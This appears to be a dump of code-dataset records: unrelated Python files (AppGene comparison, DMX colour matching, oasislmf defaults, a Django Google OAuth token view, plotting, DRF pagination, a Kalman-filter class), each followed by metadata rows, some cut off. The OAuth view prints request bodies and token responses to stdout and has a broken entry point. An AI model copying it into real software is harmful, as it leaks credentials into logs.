"""Generate all combinations of AppGene pairs of AppGene files on a list and then compare them.
Args:
geneFileList: List of full filenames for AppGene files
shuffle: (bool) Whether the combinations are shuffled
Returns:
A list of results of compared pairs. (See the comparePair and compareGenes functions for the structure of the result object for each pair.)
"""
result = []
pairList = list(itertools.combinations(geneFileList, 2))
if shuffle:
random.shuffle(pairList)
for genePair in pairList:
pairResult = comparePair(genePair[0], genePair[1])
if pairResult is not None:
result.append(pairResult)
dumpObjectAsJson(pairResult, os.path.join(tmpDir, "_tmp_pair_result_{}".format(time.time())))
else:
print("Failed to compare pair {} {}".format(genePair[0], genePair[1]))
return result
if __name__ == '__main__':
# The usage of arguments is self-explanatory, as follows
argParser = argparse.ArgumentParser()
argParser.add_argument("--mode", choices=["single-pair", "all-pairs"], help="Mode of comparison", required=True)
argParser.add_argument("--appgene1", help="AppGene file 1 in single-pair mode")
argParser.add_argument("--appgene2", help="AppGene file 2 in single-pair mode")
argParser.add_argument("--geneDir", help="Directory containing AppGene files in all-pairs mode")
argParser.add_argument("--bufferDir", help="Directory for temporary files",
default=os.getenv("COMPARE_TEMP_DIR", os.path.curdir))
argParser.add_argument("--shuffle", help="Shuffle the order of AppGene pairs (applicable to all-pairs mode only)",
action="store_true")
argParser.add_argument("--outputFile", help="Result file to be saved", required=True)
args = argParser.parse_args()
tmpDir = os.path.realpath(args.bufferDir)
outputResult = {}
if args.mode == "single-pair":
outputResult = comparePair(os.path.realpath(args.appgene1), os.path.realpath(args.appgene2))
elif args.mode == "all-pairs":
geneRootDir = os.path.realpath(args.geneDir)
allAppGeneFiles = list(
os.path.join(geneFile[0], geneFile[1]) for geneFile in getAllFilesOfExtension(geneRootDir, ".appgene"))
outputResult = compareAppGenesInDir(allAppGeneFiles, args.shuffle)
pprint(outputResult)
dumpObjectAsJson(outputResult, args.outputFile)
| 41.669173 | 206 | 0.630218 | 1,682 | 16,626 | 6.200357 | 0.21522 | 0.019561 | 0.023013 | 0.028766 | 0.204622 | 0.136542 | 0.125228 | 0.115927 | 0.088216 | 0.050436 | 0 | 0.015048 | 0.260556 | 16,626 | 398 | 207 | 41.773869 | 0.833252 | 0.2786 | 0 | 0.089202 | 0 | 0.00939 | 0.177205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075117 | false | 0 | 0.065728 | 0 | 0.211268 | 0.089202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc7ac4c9568f74a7e2bfcb29110a9c6f879e2fd | 4,561 | py | Python | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | null | null | null | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | 1 | 2021-03-05T19:37:02.000Z | 2021-03-05T19:37:02.000Z | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fixture import FixtureRGB
import math
import time
import numpy as np
def rel_diff(cur, ref) -> float:
if ref == 0:
return cur
return (ref - cur) / ref
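# Worked example (assumed readings, illustrative only): a current value 20%
# below the reference gives rel_diff(80, 100) == (100 - 80) / 100 == 0.2.
assert abs(rel_diff(80, 100) - 0.2) < 1e-12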
def get_max_index(array):
max_index = 0
for i in range(len(array)):
if array[i] > array[max_index]:
max_index = i
return max_index
def get_min_index(array):
min_index = 0
for i in range(len(array)):
if array[i] < array[min_index]:
min_index = i
return min_index
def sign(val):
return math.copysign(1, val)
def divide_array(array, divisor):
for i in range(len(array)):
array[i] = int(array[i] / divisor)
if __name__ == "__main__":
org_rgbc = [1508, 1147, 2873, 5526]
org_dmx = [200, 150, 210]
#org_rgbc = [3333,1186,705,5057]
#org_dmx = [255, 200, 0]
#org_rgbc=[1604,1828,1144, 4597]
#org_dmx=[200, 235, 85]
#org_rgbc = [75,1259,5331,6775]
#org_dmx = [0,0,255]
csvpaths = (
"../data/adj_megatripar_red.csv",
"../data/adj_megatripar_green.csv",
"../data/adj_megatripar_blue.csv",
)
f = FixtureRGB(csvpaths)
# ENTER
dmx = [0, 0, 0]
last_dif_rel = 0
dif_rel = 0
matrix = np.zeros((3, 3), float)
dmx_best = np.zeros((3,3), int)
dif_best = np.zeros(3, float)
index_ch = 0  # index of the DMX channel currently being varied
index_base_ch = 0  # index of the base channel that is held at full output
repetitions = 0
first_miss = True
initialized = False
updown = 5
# LOOP
for ref in range(3):
for var in range(3):
matrix[ref, var] = rel_diff(org_rgbc[var], org_rgbc[3])
def reset():
global index_ch
global index_base_ch
global repetitions
global first_miss
global updown
global dmx
global initialized
index_ch = 0
repetitions = 0
first_miss = True
initialized = False
updown = 5
dmx = [0, 0, 0]
dmx[index_base_ch] = 255
reset()
while True:
# skip base_ch
index_ch = index_ch%len(dmx)
if index_ch == index_base_ch :
index_ch += 1
continue
last_dif_rel = dif_rel
cur_abs_rgbc = f.in_out(dmx)
dif_rel = pow(rel_diff(cur_abs_rgbc[0], cur_abs_rgbc[3]) - matrix[1, 0], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[1], cur_abs_rgbc[3]) - matrix[2, 1], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[2], cur_abs_rgbc[3]) - matrix[0, 2], 2)
if not initialized:
initialized = True
last_dif_rel = dif_rel
last_dmx = dmx[index_ch]
print(
f"{repetitions} {index_base_ch} {index_ch} {last_dif_rel:07.4f} {dif_rel:07.4f} {first_miss} [{dmx[0]:03d},{dmx[1]:03d},{dmx[2]:03d}]",
end="\n",
)
if dif_rel > last_dif_rel:
    # the last step made the match worse: revert it and, on the first miss,
    # try the opposite direction; on the second miss, move to the next channel
    dmx[index_ch] = last_dmx
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
continue
last_dmx = dmx[index_ch]
dmx[index_ch] += updown
if dmx[index_ch] > 255:
dmx[index_ch] = 255
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
elif dmx[index_ch] < 0:
dmx[index_ch] = 0
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
if repetitions == 10:
    updown = 1  # switch from coarse steps of 5 to fine steps of 1
if repetitions == 30:
dif_best[index_base_ch] = dif_rel
for i in range(len(dmx)):
dmx_best[index_base_ch, i] = dmx[i]
print(f"Mid Result ({index_base_ch}): {dmx_best[index_base_ch]} with {dif_best[index_base_ch]:07.4f} match")
index_base_ch += 1
if index_base_ch==len(dmx):
break
reset()
#input("Enter to continue")
best_max_ch = get_min_index(dif_best)
dmx_final = dmx_best[best_max_ch]
print(f"Final Result: {dmx_final} with {dif_best[best_max_ch]:07.4f} match")
# print(f"")
#time.sleep(0.2)
| 24.923497 | 147 | 0.521377 | 613 | 4,561 | 3.626427 | 0.205546 | 0.059829 | 0.059379 | 0.019793 | 0.329285 | 0.221772 | 0.213225 | 0.213225 | 0.201529 | 0.134053 | 0 | 0.063022 | 0.370314 | 4,561 | 182 | 148 | 25.06044 | 0.711003 | 0.06446 | 0 | 0.354331 | 0 | 0.015748 | 0.093625 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047244 | false | 0 | 0.031496 | 0.007874 | 0.11811 | 0.023622 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc7f5b2b9f4e310e35dc3ebd0e3ad778fc7d355 | 3,880 | py | Python | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | 1 | 2019-10-25T03:15:14.000Z | 2019-10-25T03:15:14.000Z | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | null | null | null | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | null | null | null | __all__ = [
'get_config_profile',
'get_default_accounts_profile',
'get_default_deterministic_analysis_settings',
'get_default_exposure_profile',
'get_default_fm_aggregation_profile',
'get_default_unified_profile',
'get_loc_dtypes',
'get_acc_dtypes',
'get_scope_dtypes',
'get_info_dtypes',
'KTOOLS_ALLOC_RULE_IL',
'KTOOLS_ALLOC_RULE_GUL',
'KTOOLS_FIFO_RELATIVE',
'KTOOLS_DEBUG',
'KTOOLS_MEM_LIMIT',
'KTOOLS_NUM_PROCESSES',
'OASIS_FILES_PREFIXES',
'SUMMARY_MAPPING',
'SUMMARY_OUTPUT',
'SOURCE_IDX',
'SOURCE_FILENAMES',
'STATIC_DATA_FP',
'WRITE_CHUNKSIZE'
]
import os
from collections import OrderedDict
from .data import (
get_json,
)
SOURCE_FILENAMES = OrderedDict({
'loc': 'location.csv',
'acc': 'account.csv',
'info': 'reinsinfo.csv',
'scope': 'reinsscope.csv'
})
# Store index from merged source files (for later slice & dice)
SOURCE_IDX = OrderedDict({
'loc': 'loc_idx',
'acc': 'acc_idx',
'info': 'info_idx',
'scope': 'scope_idx'
})
SUMMARY_MAPPING = OrderedDict({
'gul_map_fn': 'gul_summary_map.csv',
'fm_map_fn': 'fm_summary_map.csv'
})
SUMMARY_OUTPUT = OrderedDict({
'gul': 'gulsummaryxref.csv',
'il': 'fmsummaryxref.csv'
})
# Path for storing static data/metadata files used in the package
STATIC_DATA_FP = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)), '_data')
# Default profiles that describe the financial terms in the OED acc. and loc.
# (exposure) files, as well as how aggregation of FM input items is performed
# in the different OED FM levels
def get_default_accounts_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_acc_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_exposure_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_loc_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_config_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'config_compatibility_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_unified_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_unified_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_fm_aggregation_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_fm_agg_profile.json')
return {int(k): v for k, v in get_json(src_fp=fp).items()} if not path else fp
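# Minimal usage sketch (a hypothetical helper; assumes the packaged _data
# JSON files are present): the aggregation profile is keyed by integer FM
# level numbers, i.e. the file's string keys such as "1" are cast to 1 above.
def _example_agg_profile_keys():
    profile = get_default_fm_aggregation_profile()
    assert all(isinstance(k, int) for k in profile)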
def get_loc_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'loc_dtypes.json')
return get_json(src_fp=fp)
def get_acc_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'acc_dtypes.json')
return get_json(src_fp=fp)
def get_scope_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'scope_dtypes.json')
return get_json(src_fp=fp)
def get_info_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'info_dtypes.json')
return get_json(src_fp=fp)
WRITE_CHUNKSIZE = 2 * (10 ** 5)
# Default name prefixes of the Oasis input files (GUL + IL)
OASIS_FILES_PREFIXES = OrderedDict({
'gul': {
'complex_items': 'complex_items',
'items': 'items',
'coverages': 'coverages',
},
'il': {
'fm_policytc': 'fm_policytc',
'fm_profile': 'fm_profile',
'fm_programme': 'fm_programme',
'fm_xref': 'fm_xref',
}
})
# Default analysis settings for deterministic loss generation
def get_default_deterministic_analysis_settings(path=False):
fp = os.path.join(STATIC_DATA_FP, 'analysis_settings.json')
return get_json(src_fp=fp) if not path else fp
# Defaults for Ktools runtime parameters
KTOOLS_NUM_PROCESSES = -1
KTOOLS_MEM_LIMIT = False
KTOOLS_FIFO_RELATIVE = False
KTOOLS_ALLOC_RULE_IL = 2
KTOOLS_ALLOC_RULE_GUL = 1 # 1 = new item stream, 0 = use prev Coverage stream
KTOOLS_DEBUG = False
| 26.758621 | 107 | 0.70799 | 566 | 3,880 | 4.524735 | 0.227915 | 0.0328 | 0.056228 | 0.051542 | 0.380711 | 0.315502 | 0.315502 | 0.307302 | 0.248731 | 0.235845 | 0 | 0.002813 | 0.175258 | 3,880 | 144 | 108 | 26.944444 | 0.7975 | 0.132732 | 0 | 0.138614 | 0 | 0 | 0.30462 | 0.101043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09901 | false | 0 | 0.029703 | 0 | 0.227723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cca040e273e226a19dc1e216e57277c3625c810 | 1,107 | py | Python | api/views.py | aleattene/ASD-Management | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | null | null | null | api/views.py | aleattene/ASD-Management | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | 21 | 2021-07-22T08:32:24.000Z | 2022-02-16T10:38:24.000Z | api/views.py | aleattene/asd-management-webapp-responsive | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | null | null | null | import requests
import json
from environs import Env
from django.http import HttpResponse, HttpResponseBadRequest, HttpRequest
from django.views.decorators.csrf import csrf_exempt, csrf_protect
env = Env()
@csrf_exempt
# @api_view(['POST'])
def request_access_token(request):
client_secret = env.str("GOOGLE_CLIENT_SECRET")
print(request.headers)
print(request.body)
data_request = json.loads(request.body)
print(data_request["code"])
url = "https://oauth2.googleapis.com/token"
payload = {
"code": data_request["code"],
"client_id": data_request["client_id"],
"client_secret": client_secret,
"redirect_uri": "https://asdmanagement.netlify.app/callback/",
"grant_type": "authorization_code"
}
    # the OAuth2 token endpoint expects form-encoded parameters in the POST
    # body (RFC 6749), so they are sent via data= rather than params=
    response = requests.post(url, data=payload)
print(response.headers)
print(response.text)
    if response.status_code == 200:
        return HttpResponse(response.text, status=200, content_type='application/json')
    else:
        return HttpResponse(status=response.status_code)
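# Illustrative shape of a successful token response per RFC 6749 (field names
# are standard; the values are placeholders, not real tokens):
def example_token_payload():
    return {
        "access_token": "<opaque-access-token>",
        "expires_in": 3599,
        "token_type": "Bearer",
        "id_token": "<jwt-id-token>",
    }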
if __name__ == "__main__":
request_access_token() | 29.131579 | 82 | 0.707317 | 130 | 1,107 | 5.769231 | 0.469231 | 0.064 | 0.048 | 0.085333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007659 | 0.174345 | 1,107 | 38 | 83 | 29.131579 | 0.81291 | 0.017164 | 0 | 0 | 0 | 0 | 0.188592 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0 | 0.266667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ccc6cbd9c91a838175af4e8950b1d1c84a28033 | 555 | py | Python | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | # 30 while문을 이용 100이상10000미만 5의배수 합구하기
number = 100
isloot = True
sumnum = 0
while isloot:
if number >= 10000:
isloot = False
sumnum += number
number += 5
print(sumnum)
# 34: write a program that converts Fahrenheit (F) to Celsius (C)
# Celsius = (100/180) x (Fahrenheit - 32)
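# Quick check of the formula with an assumed input (not part of the
# exercise): 212 F -> (100/180) * (212 - 32) = 100 C, water's boiling point.
assert abs((100 / 180) * (212 - 32) - 100) < 1e-9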
F = 0
C = 0
isloot = True
while isloot:
    F = int(input('Enter the Fahrenheit value to convert to Celsius (enter 0 to quit): '))
    if F > 0:
        C = (100/180)*(F-32)
        print('Celsius is %d' % (C))
    elif F == 0:
        print('Exiting the program')
        isloot = False
    else:
        print('Please enter a positive number')
# 35: change (coin) calculation program
| 14.605263 | 49 | 0.533333 | 87 | 555 | 3.402299 | 0.574713 | 0.02027 | 0.02027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124661 | 0.335135 | 555 | 37 | 50 | 15 | 0.677507 | 0.192793 | 0 | 0.272727 | 0 | 0 | 0.129841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd0e0ae6fade5e80f9f3332ac23be40551b8667 | 6,344 | py | Python | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | import numpy as np
import pickle as pkl
import os
import matplotlib.pyplot as plt
from brokenaxes import brokenaxes
from latex_utils import latexify
baseline = "indiv"
methods = [
# "epo",
# "pmtl",
"linscalar",
# "gradnorm",
"gradortho",
"gradalign",
# "gradvacc",
# "graddrop",
# "itmtl",
# "mgda",
# "pcgrad",
# "graddrop_deterministic",
# "graddrop_random",
]
markers = {"epo": "*",
"pmtl": "^",
"linscalar": "s",
"gradnorm": "v",
"graddrop":"1",
"itmtl":"p",
"mgda":"+",
"pcgrad":"D",
"indiv": "o"}
msz = {"epo": 45,
"pmtl": 30,
"linscalar": 25,
"gradnorm": 30,
"graddrop":30,
"itmtl":30,
"mgda":30,
"pcgrad":30,
"indiv": "o"}
datasets = ["mnist",
"fashion",
"fashion_and_mnist"
]
model = 'lenet'
niters, nprefs = 100, 5
folder = f"results"
data = dict()
for dataset in datasets:
print(dataset)
data[dataset] = dict()
for method in [baseline] + methods:
print(f"\t{method}")
file_pfx = f"{method}_{dataset}_{model}_{niters}"
file_sfx = "" if method == 'individual' else f"_{nprefs}_from_0-{nprefs-1}"
file = file_pfx + file_sfx + ".pkl"
results = pkl.load(open(os.path.join(folder, file), 'rb'))
last_ls, last_acs, rs = [], [], []
for i in results:
r, res = results[i]["r"], results[i]["res"]
ls, acs = res["training_losses"], res["training_accuracies"]
rs.append(r)
last_ls.append(ls[-1])
last_acs.append(acs[-1])
last_ls, last_acs = np.asarray(last_ls), np.asarray(last_acs)
data[dataset][method] = {"last_ls": last_ls,
"last_acs": last_acs,
"rs": rs}
if method == "linscalar":
data[dataset]["rlens"] = [1.2 * np.linalg.norm(l) for l in last_ls]
data[dataset]["max1"] = np.max(last_ls, axis=0)
if dataset == "fashion":
print(last_ls)
print(data[dataset]["max1"])
if method == "epo":
data[dataset]["max2"] = np.max(last_ls, axis=0)
data[dataset]["rs"] = rs
if dataset == "fashion":
print(last_ls)
if method == "individual":
data[dataset]["baseline_loss"] = []
data[dataset]["baseline_acc"] = []
for i, r in enumerate(rs):
if r[0] == 0:
lxs, lys = [0, 10], [min(last_ls[i]), min(last_ls[i])]
axs, ays = [0, 1], [max(last_acs[i]), max(last_acs[i])]
else:
lxs, lys = [min(last_ls[i]), min(last_ls[i])], [0, 10]
axs, ays = [max(last_acs[i]), max(last_acs[i])], [0, 1]
data[dataset]["baseline_loss"].append((lxs, lys))
data[dataset]["baseline_acc"].append((axs, ays))
# import pdb; pdb.set_trace()  # debugging breakpoint, left disabled
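# Illustrative helper (not part of the original script): summarise one loaded
# results pickle, whose layout the loop above relies on, i.e.
# results[i] = {"r": preference ray, "res": {"training_losses": [...],
# "training_accuracies": [...]}}.
def describe_results(results):
    for i in results:
        r, res = results[i]["r"], results[i]["res"]
        print(i, "ray:", r, "final loss:", res["training_losses"][-1])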
# latexify(fig_width=2.25, fig_height=1.5)
from matplotlib import rc
rc("text", usetex=False)
for dataset in datasets:
fig = plt.figure()
# max1x, max1y = data[dataset]["max1"]
# max2x, max2y = data[dataset]["max2"]
max2x = 0.7
max2y = 0.7
max1x = 1.0
max1y = 1.0
ax = brokenaxes(xlims=((-.05, max2x + .05), (max1x - .1, max1x + .15)),
ylims=((-.05, max2y + .05), (max1y - .1, max1y + .1)),
hspace=0.05, wspace=0.05, fig=fig)
ax.set_xlabel(r"task 1 loss")
ax.set_ylabel(r"task 2 loss")
for i, (xs, ys) in enumerate(data[dataset]["baseline_loss"]):
label = "baseline\nloss" if i == 0 and dataset == "fashion" else ""
ax.plot(xs, ys, lw=2, alpha=0.4, c='k', label=label)
colors = []
for i, (r, l) in enumerate(zip(data[dataset]["rs"],
data[dataset]["rlens"])):
label = r"$r^{-1}$ Ray" if i == 0 and dataset == "fashion" else ""
r_inv = np.sqrt(1 - r**2)
lines = ax.plot([0, .9 * l * r_inv[0]], [0, .9 * l * r_inv[1]],
lw=1, alpha=0.5, ls='--', dashes=(10, 2), label=label)
colors.append(lines[0][0].get_color())
if i in range(1, len(data[dataset]["rs"]) - 1):
ax0 = 0.85 * l * r_inv[0]
ay0 = 0.85 * l * r_inv[1]
else:
ax0 = 0.9 * r_inv[0]
ay0 = 0.9 * r_inv[1]
ax.arrow(ax0, ay0, .05 * r_inv[0], .05 * r_inv[1],
color=colors[-1], lw=1, head_width=.04, alpha=0.5)
for method in methods:
print(method)
last_ls = data[dataset][method]["last_ls"]
s = 20 if method == "epo" else 20
ax.scatter(last_ls[:, 0], last_ls[:, 1], marker=markers[method],
c=colors, s=msz[method] , label=method)
if dataset in ["mnist", "fashion_and_mnist"]:
ax.legend()
fig.savefig(f"figures/{dataset}_loss.pdf")
# latexify(fig_width=2.25, fig_height=1.5)
from matplotlib import rc
rc("text", usetex=False)
for dataset in datasets:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlabel(r"task 1 accuracies")
ax.set_ylabel(r"task 2 accuracies")
# Hide the right and top spines
ax.spines['left'].set_visible(False)
ax.spines['bottom'].set_visible(False)
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position('right')
ax.xaxis.set_ticks_position('top')
ax.yaxis.set_label_position('right')
ax.xaxis.set_label_position('top')
for i, (xs, ys) in enumerate(data[dataset]["baseline_acc"]):
label = "baseline" if i == 0 and dataset == "mnist" else ""
ax.plot(xs, ys, lw=2, alpha=0.4, c='k', label=label)
for method in methods:
last_acs = data[dataset][method]["last_acs"]
label = method #if dataset == "fashion_and_mnist" else ""
s = 30 if method == "epo" else 30
ax.scatter(last_acs[:, 0], last_acs[:, 1], marker=markers[method],
c=colors, s=msz[method], label=label)
if dataset in ["mnist", "fashion_and_mnist"]:
ax.legend()
fig.savefig(f"figures/{dataset}_acc.pdf")
plt.show()
| 35.049724 | 83 | 0.51466 | 842 | 6,344 | 3.764846 | 0.218527 | 0.069401 | 0.035962 | 0.012618 | 0.318612 | 0.278233 | 0.211987 | 0.197476 | 0.170978 | 0.147003 | 0 | 0.040534 | 0.315574 | 6,344 | 180 | 84 | 35.244444 | 0.689544 | 0.062579 | 0 | 0.154362 | 0 | 0 | 0.123461 | 0.019059 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060403 | 0 | 0.060403 | 0.040268 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd259722e42f71cb19331be9d7293420eff0873 | 2,187 | py | Python | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | from collections import OrderedDict
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from rest_framework.utils.urls import remove_query_param, replace_query_param
class HeaderLimitOffsetPagination(LimitOffsetPagination):
def paginate_queryset(self, queryset, request, view=None):
self.use_envelope = False
if str(request.GET.get("envelope")).lower() in ["true", "1"]:
self.use_envelope = True
return super().paginate_queryset(queryset, request, view)
def get_paginated_response(self, data):
next_url = self.get_next_link()
previous_url = self.get_previous_link()
first_url = self.get_first_link()
last_url = self.get_last_link()
links = []
for label, url in (
("first", first_url),
("next", next_url),
("previous", previous_url),
("last", last_url),
):
if url is not None:
links.append('<{}>; rel="{}"'.format(url, label))
headers = {"Link": ", ".join(links)} if links else {}
if self.use_envelope:
return Response(
OrderedDict(
[
("count", self.count),
("first", first_url),
("next", next_url),
("previous", previous_url),
("last", last_url),
("results", data),
]
),
headers=headers,
)
return Response(data, headers=headers)
def get_first_link(self):
if self.offset <= 0:
return None
url = self.request.build_absolute_uri()
return remove_query_param(url, self.offset_query_param)
def get_last_link(self):
if self.offset + self.limit >= self.count:
return None
url = self.request.build_absolute_uri()
url = replace_query_param(url, self.limit_query_param, self.limit)
offset = self.count - self.limit
return replace_query_param(url, self.offset_query_param, offset)
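
# --- Usage sketch (illustrative; the view, model and serializer names below
# are hypothetical placeholders, not part of this module) ---------------------
#
# from rest_framework import generics
#
# class RentalListView(generics.ListAPIView):
#     queryset = Rental.objects.all()
#     serializer_class = RentalSerializer
#     pagination_class = HeaderLimitOffsetPagination
#
# GET /rentals/?limit=10&offset=20 then returns the bare result list plus an
# RFC 5988 Link header built by get_paginated_response(), e.g.:
#   Link: <...?limit=10>; rel="first", <...?limit=10&offset=30>; rel="next"
# Adding &envelope=true (or =1) instead wraps the results in an OrderedDict
# envelope with count/first/next/previous/last keys alongside the Link header.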
| 35.274194 | 77 | 0.566529 | 232 | 2,187 | 5.107759 | 0.271552 | 0.053165 | 0.033755 | 0.043038 | 0.274262 | 0.214346 | 0.214346 | 0.15865 | 0.091139 | 0.091139 | 0 | 0.001362 | 0.328761 | 2,187 | 61 | 78 | 35.852459 | 0.805858 | 0 | 0 | 0.230769 | 0 | 0 | 0.039781 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd790991b2e8bb7fe6665f9e39b218f772a44ee | 12,076 | py | Python | elbow/models/time_series.py | davmre/elbow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 93 | 2016-10-04T23:15:54.000Z | 2021-01-10T20:31:36.000Z | elbow/models/time_series.py | davmre/bayesflow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 1 | 2017-02-22T11:29:15.000Z | 2017-02-22T21:13:36.000Z | elbow/models/time_series.py | davmre/elbow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 19 | 2016-10-26T08:19:39.000Z | 2019-12-19T02:26:43.000Z | import numpy as np
import tensorflow as tf
import elbow.util as util
from elbow import ConditionalDistribution
import scipy.stats
from elbow.gaussian_messages import MVGaussianMeanCov, reverse_message, forward_message
from elbow.parameterization import unconstrained, psd_matrix, psd_diagonal
class LinearGaussian(ConditionalDistribution):
def __init__(self, shape, K, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None,
**kwargs):
# a linear Gaussian state-space model (aka Kalman filter) with dimensions
# T: number of time steps
# D: dimension of hidden state
# K: dimension of output
# We allow K=0 (implied by observation_mat=None) in which case the model is
        # just a Markov chain -- this can be useful on its own or in conjunction with
# non-Gaussian (e.g., neural/VAE) observation models.
self.T, self.D = shape
self.K = K
if observation_mean is None:
self._flag_no_obs = True
observation_mean = tf.zeros((self.D,), dtype=tf.float32)
